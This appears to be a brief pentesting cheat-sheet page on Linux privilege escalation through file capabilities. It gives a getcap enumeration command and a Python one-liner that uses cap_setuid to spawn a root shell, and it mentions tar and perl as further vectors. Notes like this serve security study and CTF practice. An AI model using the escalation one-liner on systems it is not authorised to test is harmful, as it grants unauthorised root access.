Capabilities
{% embed url="<https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/" %}
Capabilities
{% embed url="https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/" %}
{% embed url="https://mn3m.info/posts/suid-vs-capabilities/" %}
This is similar to SUID. Processes can be privileged running as 0 or non-privileged running as anything other than 0. Processes running as 0 can pass checks while others can't. Capabilities are more secure than SUID but can still be vulnerable
Hunting capabilities
01getcap -r / 2>/dev/null{% hint style="info" %} cap_setuid+ep means capability, set to SUID to permissions everything {% endhint %}
All we have to do is run the binary and make it do something that will turn us into root
Python example
$/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'{% hint style="info" %} Other useful tools are tar (read files) perl (reverse shell) {% endhint %}
Tar example
{% hint style="info" %} cap_dac_read_search allows to to "Bypass file read permission checks and directory read and execute permission checks" {% endhint %}
{% embed url="https://app.gitbook.com/o/4cuxnrxcO9zV8MithZcs/s/SBzxWZ0EMDOdQIjKvSn2/warm-up/empire-breakout/priv-esc" %}
{% embed url="https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/?source=post_page-----0e678eb67276--------------------------------" %}